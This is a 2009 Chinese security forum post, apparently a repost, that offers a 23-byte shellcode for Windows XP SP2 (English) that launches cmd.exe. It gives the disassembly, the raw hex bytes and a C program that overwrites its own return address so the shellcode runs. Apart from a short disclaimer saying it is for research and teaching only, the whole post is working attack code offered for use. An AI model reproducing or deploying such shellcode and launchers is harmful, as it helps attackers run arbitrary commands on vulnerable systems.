服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

dirtysea 发表于 2009-8-15 01:09:46

win32/xp sp2 (En) cmd.exe 23 bytes

测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!/* [*]win32/xp sp2 (En) cmd.exe 23 bytes[*]Author : Mountassif Moad[*]A.K.A : Stack[*]Description : It's a 23 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 En[*][*]get the following if we disassemle this code compiled with olly debugger[*][*]00402000> 8BEC             MOV EBP,ESP[*]00402002. 68 65786520      PUSH 20657865[*]00402007. 68 636D642E      PUSH 2E646D63[*]0040200C. 8D45 F8          LEA EAX,DWORD PTR SS:[*]0040200F. 50               PUSH EAX[*]00402010. B8 8D15867C      MOV EAX,kernel32.WinExec[*]00402015. FFD0             CALL EAX[*]*/[*]#include <stdio.h>[*]unsigned char shellcode[] =[*]                        "\x8b\xec\x68\x65\x78\x65"[*]                        "\x20\x68\x63\x6d\x64\x2e"[*]                        "\x8d\x45\xf8\x50\xb8\x8D"[*]                        "\x15\x86\x7C\xff\xd0";[*]int main ()[*]{[*]int *ret;[*]ret=(int *)&ret+2;[*]printf("Shellcode Length is : %d\n",strlen(shellcode));[*](*ret)=(int)shellcode;[*]return 0;[*]}
页: [1]
查看完整版本: win32/xp sp2 (En) cmd.exe 23 bytes